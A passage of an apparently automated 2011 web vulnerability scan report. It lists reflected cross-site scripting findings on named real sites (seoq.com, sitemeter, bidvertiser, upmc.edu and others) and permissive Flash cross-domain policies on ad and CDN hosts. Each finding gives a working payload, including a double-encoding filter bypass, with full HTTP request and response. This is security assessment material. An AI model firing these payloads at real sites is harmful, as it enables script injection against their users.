Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2841/N2ec04';0a71d25a67d';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.141. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8e883<img%20src%3da%20onerror%3dalert(1)>6de707698a9 was submitted in the REST URL parameter 6. This input was echoed as 8e883<img src=a onerror=alert(1)>6de707698a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2841/N8e883<img%20src%3da%20onerror%3dalert(1)>6de707698a9 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:37 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>6de707698a9" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2841/N8e883<img src=a onerror=alert(1)>6de707698a9ddd</a>
...[SNIP]...

7.142. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b4eb"><img%20src%3da%20onerror%3dalert(1)>111f2913bfc was submitted in the REST URL parameter 6. This input was echoed as 8b4eb"><img src=a onerror=alert(1)>111f2913bfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2841/N8b4eb"><img%20src%3da%20onerror%3dalert(1)>111f2913bfc HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:31 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:32 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2841/N8b4eb"><img src=a onerror=alert(1)>111f2913bfc" title="SEO Quotient for ">
...[SNIP]...

7.143. http://www.seoq.com/webstatshq/www.onlinemicrofiche.com [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /webstatshq/www.onlinemicrofiche.com

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38b60"style%3d"x%3aexpression(alert(1))"d66771aed6f was submitted in the REST URL parameter 2. This input was echoed as 38b60"style="x:expression(alert(1))"d66771aed6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /webstatshq/www.onlinemicrofiche.com38b60"style%3d"x%3aexpression(alert(1))"d66771aed6f HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:13:47 GMT
Server: Apache
Set-Cookie: PHPSESSID=um5u5c0a1mc9cgem5l60jo9i27; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 34825

angInfo('Cat keywords')));

?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<meta name="description" content="onlinemicrofiche.com38b60"style="x:expression(alert(1))"d66771aed6f on sites like " />
...[SNIP]...

7.144. http://bdv.bidvertiser.com/BidVertiser.dbm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bdv.bidvertiser.com
Path:   /BidVertiser.dbm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a2dd'-alert(1)-'3b6a11685b8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /BidVertiser.dbm?pid=349166&bid=862453 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bdv.bidvertiser.com
Referer: http://www.google.com/search?hl=en&q=6a2dd'-alert(1)-'3b6a11685b8

Response

HTTP/1.1 200 OK
Date: Monday, 02-May-2011 02:35:12 GMT
Cache-Control: no-store
Last-Modified: Sunday, 02-May-2010 02:35:12 GMT
P3P: policyref="http://www.bidvertiser.com/bdv/bidvertiser/p3p.xml", CP="NOI DEV PSA PSD IVA OTP OUR OTR IND OTC"
Content-Type: text/html; charset=ISO-8859-1
Content-Len: 1523
Warning: 214 "Juniper Networks DX Active"
Vary: Accept-Encoding, User-Agent
Content-Length: 1523


try
{
tref=1;
win_name='null';
report_error=0;
docref='';
try
{
if (window.top.location=='') aa=1;
docref=document.referrer;
}
catch(er)
{
report_error=1;
docref='none';
}
if (report_err
...[SNIP]...
_frame='ifr' + 'ame' + ' name="BidVertiser_Frame"' + ' src="http://bdv.bidvertiser.com/bidvertiser.dbm?pid=349166&bid=862453&RD=45&DIF=1' + '&bd_ref_v=' + escape('http://www.google.com/search?hl=en&q=6a2dd'-alert(1)-'3b6a11685b8') + '&tref=' + tref + '&win_name=' + win_name + '&docref=' + docref + '&jsrand=' + jsrand + '&js1loc=' + escape(window.location.href) + '"' + ' width=468 ' + ' height=60 ' + ' marginwidth="0" ' + ' m
...[SNIP]...

7.145. http://s28.sitemeter.com/js/counter.asp [IP cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 152b9"%3balert(1)//74ef2e7ad98 was submitted in the IP cookie. This input was echoed as 152b9";alert(1)//74ef2e7ad98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /js/counter.asp?site=s28japanator HTTP/1.1
Host: s28.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243152b9"%3balert(1)//74ef2e7ad98

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 02:06:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7294
Content-Type: application/x-javascript
Expires: Mon, 02 May 2011 02:16:53 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243152b9";alert(1)//74ef2e7ad98";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

7.146. http://s28.sitemeter.com/js/counter.js [IP cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6e88"%3balert(1)//e83db7807b was submitted in the IP cookie. This input was echoed as c6e88";alert(1)//e83db7807b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /js/counter.js?site=s28japanator HTTP/1.1
Host: s28.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243c6e88"%3balert(1)//e83db7807b

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 02:06:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7293
Content-Type: application/x-javascript
Expires: Mon, 02 May 2011 02:16:50 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243c6e88";alert(1)//e83db7807b";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

7.147. http://www.a-m-7.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.a-m-7.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c02da%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed81d56a3b9c was submitted in the REST URL parameter 1. This input was echoed as c02da"><script>alert(1)</script>d81d56a3b9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icoc02da%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed81d56a3b9c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.a-m-7.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Mon, 02 May 2011 00:28:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash02
X-AspNet-Version: 2.0.50727
Content-Length: 203
Location: http://www.amateurmatch.com/favicon.icoc02da"><script>alert(1)</script>d81d56a3b9c
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://www.amateurmatch.com/favicon.icoc02da"><script>alert(1)</script>d81d56a3b9c">here</a>.</body
...[SNIP]...

7.148. http://www.a-m-7.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.a-m-7.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b831e"><script>alert(1)</script>99020df904c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?b831e"><script>alert(1)</script>99020df904c=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.a-m-7.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Mon, 02 May 2011 00:28:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash02
X-AspNet-Version: 2.0.50727
Content-Length: 206
Location: http://www.amateurmatch.com/favicon.ico?b831e"><script>alert(1)</script>99020df904c=1
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://www.amateurmatch.com/favicon.ico?b831e"><script>alert(1)</script>99020df904c=1">here</a>.</b
...[SNIP]...

7.149. http://www.aiu-online.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aiu-online.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aacd"><script>alert(1)</script>585d6f184ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?7aacd"><script>alert(1)</script>585d6f184ff=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiu-online.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 02 May 2011 00:08:54 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 263
Location: http://www.aiuonline.edu/favicon.ico?7aacd"><script>alert(1)</script>585d6f184ff=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.aiuonline.edu/favicon.ico?7aacd"><script>alert(1)</script>585d6f184ff=1">http://www.aiuonline.edu/favicon.ico?
...[SNIP]...

7.150. http://www.aiu-online.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aiu-online.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 64030<script>alert(1)</script>ba29df295d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?64030<script>alert(1)</script>ba29df295d9=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiu-online.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 02 May 2011 00:08:54 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 259
Location: http://www.aiuonline.edu/favicon.ico?64030<script>alert(1)</script>ba29df295d9=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.aiuonline.edu/favicon.ico?64030<script>alert(1)</script>ba29df295d9=1">http://www.aiuonline.edu/favicon.ico?64030<script>alert(1)</script>ba29df295d9=1</a>
...[SNIP]...

7.151. http://www.upmc.edu/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.upmc.edu
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6476a"><script>alert(1)</script>b938a207577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?6476a"><script>alert(1)</script>b938a207577=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.upmc.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:30:27 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6520
X-Powered-By: ASP.NET
Location: http://upmc.com/?6476a"><script>alert(1)</script>b938a207577=1
Content-Length: 248
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1><p>The document has moved <a href="http://upmc.com/?6476a"><script>alert(1)</script>b938a207577=1">
...[SNIP]...

8. Flash cross-domain policy
There are 127 instances of this issue:


8.1. http://0.gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Mon, 02 May 2011 02:47:03 GMT
Expires: Mon, 02 May 2011 02:52:03 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

8.2. http://1.gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://1.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Mon, 02 May 2011 02:48:11 GMT
Expires: Mon, 02 May 2011 02:53:11 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

8.3. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Sun, 01 May 2011 23:33:31 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

8.4. http://ad.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 02 May 2011 02:20:09 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 02 May 2011 02:20:08 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

8.5. http://admeld.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admeld.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:10:33 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

8.6. http://admonkey.dapper.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://admonkey.dapper.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admonkey.dapper.net

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 02 May 2011 02:35:22 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Tue, 03 Aug 2010 09:20:10 GMT
ETag: "1b4b458-ca-48ce7d2dee680"
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

8.7. http://ajax.googleapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Mon, 02 May 2011 02:52:52 GMT
Date: Sun, 01 May 2011 02:52:52 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 84983

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

8.8. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
